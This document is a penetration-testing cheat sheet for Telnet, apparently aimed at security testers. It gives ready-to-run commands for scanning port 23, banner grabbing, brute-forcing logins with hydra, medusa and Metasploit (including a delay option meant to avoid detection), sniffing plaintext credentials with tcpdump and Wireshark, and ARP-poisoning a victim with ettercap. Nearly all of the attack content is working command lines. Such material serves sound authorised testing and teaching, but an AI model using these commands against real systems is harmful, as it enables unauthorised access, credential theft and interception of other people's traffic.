Port 23 – Telnet
Pentesting Telnet
Discovery and Enumeration
Before attempting exploitation, confirming that Telnet is running on a target is essential. You can use several network scanning techniques detailed here to identify potential targets to test for Telnet.
Scanning for Telnet Services
You can use the Nmap tool to detect Telnet services across a network or specific target.
nmap -p 23 10.1.1.1 #Scan for open Telnet port on a single target nmap -p 23 10.1.1.0/24 #Scan for open Telnet ports on a subnet nmap -p 23 -iL targets.txt #Scan for open Telnet ports for a list of targets nmap -p 23 -sV 10.1.1.1 #Detect service version nmap -p 23 --script=telnet-ntlm-info 10.1.1.1 #Check if NTLM authentication is enabled
Banner Grabbing and Fingerprinting
Banner grabbing can reveal details that can be used in further attacks against the application, device, etc, such as system information, OS details, or authentication prompts.
Using Netcat
nc -vn 10.1.1.1 23
Using Telnet Client
telnet 10.1.1.1 23
If the connection is successful, you might see the following to confirm:
Connected to <target-ip>. Escape character is '^]'. Welcome to XYZ Server! Login:
Using Metasploit
use auxiliary/scanner/telnet/telnet_version set RHOSTS 10.1.1.1 run
Brute-Forcing Telnet
Telnet is often configured with weak, none or default passwords. It is often enabled by default without network teams or sysadmins realising and has publically known default credentials. The following are some tools used to brute-force Telnet.
Hydra
hydra -l <username> -p <password> -s 23 10.1.1.1 telnet #Test for a specific username and password hydra -l <username> -P passwords.txt -s 23 10.1.1.1 telnet #Brute-force a single username with a password list hydra -L /path/to/usernames.txt -P passwords.txt -s 23 10.1.1.1 telnet #Brute-force multiple usernames and passwords hydra -C ~/SecLists/Passwords/Default-Credentials/telnet-betterdefaultpasslist.txt -s 23 10.1.1.1 telnet #Brute-force using username-password combinations hydra -C ~/SecLists/Passwords/Default-Credentials/telnet-betterdefaultpasslist.txt -s 23 -M SSH_Targets.txt telnet #Brute-force using username-password combinations for a list of SSH servers
Medusa
medusa -h 10.1.1.1 -u admin -P passwords.txt -M telnet #Brute-force Telnet with a single username and a password list medusa -H hosts.txt -u admin -P passwords.txt -M telnet #Brute-force Telnet on multiple hosts from a file medusa -h 10.1.1.1 -U users.txt -P passwords.txt -M telnet #Brute-force Telnet using a list of usernames and passwords medusa -h 10.1.1.1 -u admin -p password123 -M telnet #Attempt a single username and password combination medusa -h 10.1.1.1 -U users.txt -p password123 -M telnet #Brute-force Telnet with a single password and a user list medusa -h 10.1.1.1 -U users.txt -P passwords.txt -M telnet -n 23 #Specify port 23 for Telnet brute-forcing medusa -h 10.1.1.1 -u admin -P passwords.txt -M telnet -t 5 #Limit concurrent threads to 5 for controlled brute-forcing medusa -h 10.1.1.1 -u admin -P passwords.txt -M telnet -T 3 #Set a timeout of 3 seconds per attempt medusa -h 10.1.1.1 -u admin -P passwords.txt -M telnet -f #Stop on the first successful login medusa -h 10.1.1.1 -u admin -P passwords.txt -M telnet -O output.txt #Save results to an output file medusa -h 10.1.1.1 -u admin -P passwords.txt -M telnet -v 6 #Enable verbose mode for detailed output medusa -h 10.1.1.1 -u admin -P passwords.txt -M telnet -w 5 #Add a 5-second delay between attempts to avoid detection medusa -h 10.1.1.1 -u admin -P passwords.txt -M telnet -q #Quiet mode to suppress unnecessary output medusa -h 10.1.1.1 -u admin -P passwords.txt -M telnet -R #Resume a previous session if interrupted medusa -h 10.1.1.1 -u admin -P passwords.txt -M telnet -m AUTH:ntlm #Use NTLM authentication if supported by the Telnet service
Metasploit
use auxiliary/scanner/telnet/telnet_login set RHOSTS 10.1.1.1 set USERNAME admin set PASSWORD_FILE /usr/share/wordlists/rockyou.txt run
Man-in-the-Middle and Traffic Sniffing
Just like with FTP, Telnet transmits credentials in plaintext. Attackers can intercept login attempts using packet sniffers and grab credentials from the network traffic.
Wireshark
You can use the Wireshark tool:
- Open Wireshark and start capturing traffic on the network interface.
- Apply the filter:
tcp.port == 23
- Look for captured Telnet session packets and extract credentials.
Tcpdump
Tcpdump is another tool to capture Telnet traffic on a network. The following will display Telnet traffic in plaintext, including usernames and passwords.
tcpdump -i eth0 port 23 -A
Using Ettercap for MITM
If you’re on the same network as the target, you can use the Ettercap tool to capture a victim’s credentials when they login to Telnet.
ettercap -T -M arp:remote /<victim-IP>/ /<router-IP>/